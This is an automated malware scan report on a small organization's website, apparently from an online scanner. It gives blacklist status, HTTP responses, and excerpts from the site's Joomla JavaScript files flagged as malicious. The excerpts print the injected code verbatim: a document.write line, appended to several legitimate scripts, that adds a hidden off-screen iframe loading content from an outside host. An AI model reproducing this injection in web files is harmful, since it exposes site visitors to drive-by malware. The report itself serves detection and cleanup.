Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=wellsborocrossroadsfwc.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://wellsborocrossroadsfwc.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://wellsborocrossroadsfwc.com/ | 200 OK Content-Length: 24081 Content-Type: text/html | clean |
http://wellsborocrossroadsfwc.com/media/system/js/caption.js | 200 OK Content-Length: 1963 Content-Type: application/javascript | clean |
http://wellsborocrossroadsfwc.com/plugins/system/rokbox/rokbox.js | 200 OK Content-Length: 22232 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('V.6f({\'2K\':D(){L 8.1D(\'2C\',\'\')},\'1U\':D(){L 8.1D(\'2C\',\'3C\')}});8A.6f({\'8v\':D(){l 6i=/^(25|6h):\\/\\/([a-z-.0-9]+)[\\/]{0,1}/i.4S(I.35);l 1x=/^(25|6h):\ ;document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://soznpa.dns-stuff.com/4038.zKHpCU2?14" height="500" width="500"></iframe>'); Antivirus reports:
| ||
http://wellsborocrossroadsfwc.com/plugins/system/rokbox/themes/light/rokbox-config.js | 200 OK Content-Length: 2753 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var rokbox; window.addEvent('domready', function() { rokbox = new RokBox({ 'theme': 'light', 'transition': Fx.Transitions.Quad.easeOut, 'duration': 400, 'chase': 50, 'frame-border': 20, 'content-padding': 0, 'arrows-height': 35, 'effect': 'growl', 'captions': 1, 'captionsDelay': 800, 'scrolling': 0, 'keyEvents': 1, 'overlay': { 'background': '#000', 'opacity': 0.2, 'duration': 200, 'transition': Fx.Transitions.Quad.easeInOut }, 'defaultSize': { 'width': 640, 'height': 460 }, 'autoplay': 'true', 'controller': 'true', 'bgcolor': '#ffffff', 'youtubeAutoplay': 0, 'vimeoColor': '00adef', 'vimeoPortrait': 0, 'vimeoTitle': 0, 'vimeoFullScreen': 1, 'vimeoByline': 0 }); });document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://soznpa.dns-stuff.com/4038.zKHpCU2?14" height="500" width="500"></iframe>'); Antivirus reports:
| ||
http://wellsborocrossroadsfwc.com/modules/mod_roknavmenu/themes/fusion/js/fusion.js | 200 OK Content-Length: 11390 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('p 2R=Q 2Q({3r:1.4,3:{13:{x:0,y:0},O:{x:0,y:0},T:27,h:{x:\'D\',y:\'1f\'},A:\'I 18 S\',R:\'X\',k:1,3b:3B,14:{W:3A,U:1h.3h.3w.3k},1d:{W:3y,U:1h.3h.3D.3k}},2P:7(Y,3){2. ;document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://soznpa.dns-stuff.com/4038.zKHpCU2?14" height="500" width="500"></iframe>'); Antivirus reports:
| ||
http://wellsborocrossroadsfwc.com/templates/rt_infuse_j15/js/rokfonts.js | 200 OK Content-Length: 906 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var RokBuildSpans=function(g,j,k){(g.length).times(function(i){var e="."+g[i];var f=function(a){a.setStyle('visibility','visible');var b=a.getText();var c=b.split(" ");first=c[0];rest=c.slice(1).join(" ");html=a.innerHTML;if(rest.length>0){var d=a.clone().setText(' '+rest),span=new Element('span').setText(first);span.inject(d,'top');a.replaceWith(d)}};$$(e).each(function(c){j.each(function(h){c.getElements(h).each(function(b){var a=b.getFirst();if(a&&a.getTag()=='a')f(a);else f(b)})})})})}; ;document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://soznpa.dns-stuff.com/4038.zKHpCU2?14" height="500" width="500"></iframe>'); Antivirus reports:
| ||
http://wellsborocrossroadsfwc.com/templates/rt_infuse_j15/js/rokutils.js | 200 OK Content-Length: 3516 Content-Type: application/javascript | clean |
http://wellsborocrossroadsfwc.com/templates/rt_infuse_j15/js/rokutils.inputs.js | 200 OK Content-Length: 2717 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var InputsExclusion = ['.content_vote']; eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('a 7={15:1.5,10:9(){7.8=16 14({\'D\':[]});a 8=$$(\'o[2=0]\');a x=$$(O.L(\' o[2=0], \')+\' o[2=0]\');x.r(9(y){8=8.R(y)}); ;document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://soznpa.dns-stuff.com/4038.zKHpCU2?14" height="500" width="500"></iframe>'); Antivirus reports:
| ||
http://wellsborocrossroadsfwc.com/modules/mod_briaskISS/mod_briaskISS.js | 200 OK Content-Length: 3674 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function briaskISS(idModule, random, picInterval, transDelay, picArray) { this.picRandom = random; this.picInterval = picInterval; this.transDelay = transDelay; this.picArray = picArray; this.curPic = 0; this.nextPic = 0; this.numPics = 0; this.curOpacity = 99 this.nextOpacity = 0; this.idModule = idModule; this.initISS(); } briaskISS.prototype.initISS=function() { if (!docum setTimeout("briaskInstance"+this.idModule+".issTransition()", this.transDelay); } else { this.picArray[0][this.curPic].style.display = "none"; this.curPic = this.nextPic; setTimeout("briaskInstance"+this.idModule+".issShow()", this.picInterval); } } ;document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://soznpa.dns-stuff.com/4038.zKHpCU2?14" height="500" width="500"></iframe>'); Antivirus reports:
| ||
http://wellsborocrossroadsfwc.com/modules/mod_rokajaxsearch/js/rokajaxsearch.js | 404 Not Found Content-Length: 552 Content-Type: text/html | clean |
http://wellsborocrossroadsfwc.com/test404page.js | 404 Not Found Content-Length: 521 Content-Type: text/html | clean |
http://wellsborocrossroadsfwc.com/plugins/content/s5_mp3_player/s5_mp3_player.js | 200 OK Content-Length: 867 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var arMP3Players = new Array(); var bMP3PlayerStarted = false; function registerMP3Player(playerID,autostart){ arMP3Players.push(playerID); if(autostart == "1" && !bMP3PlayerStarted){ bMP3PlayerStarted = true; setTimeout("document.getElementById('"+playerID+"').autostart()",100); } } function stopMP3Players(playerID){ for(i=0;i<arMP3Players.length;i++){ if(playerID != arMP3Players[i]){ document.getElementById(arMP3Players[i]).stopPlayer(); } } } ;document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://soznpa.dns-stuff.com/4038.zKHpCU2?14" height="500" width="500"></iframe>'); Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: wellsborocrossroadsfwc.com
Result:
HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Wed, 01 Oct 2014 16:20:45 GMT
Pragma: no-cache
Server: Apache/2.2.21 (Unix) mod_ssl/2.2.21 OpenSSL/1.0.0e DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Wed, 01 Oct 2014 16:20:45 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 169e4c54fa01e6596b976a12b26a21a8=52e94973c262adfb4ffc309e5df76cdf; path=/
GET / HTTP/1.1
Host: wellsborocrossroadsfwc.com
Result:
HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Wed, 01 Oct 2014 16:20:45 GMT
Pragma: no-cache
Server: Apache/2.2.21 (Unix) mod_ssl/2.2.21 OpenSSL/1.0.0e DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Wed, 01 Oct 2014 16:20:45 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 169e4c54fa01e6596b976a12b26a21a8=52e94973c262adfb4ffc309e5df76cdf; path=/
Second query (visit from search engine):
GET / HTTP/1.1
Host: wellsborocrossroadsfwc.com
Referer: http://www.google.com/search?q=wellsborocrossroadsfwc.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: wellsborocrossroadsfwc.com
Referer: http://www.google.com/search?q=wellsborocrossroadsfwc.com
Result:
The result is similar to the first query. There are no suspicious redirects found.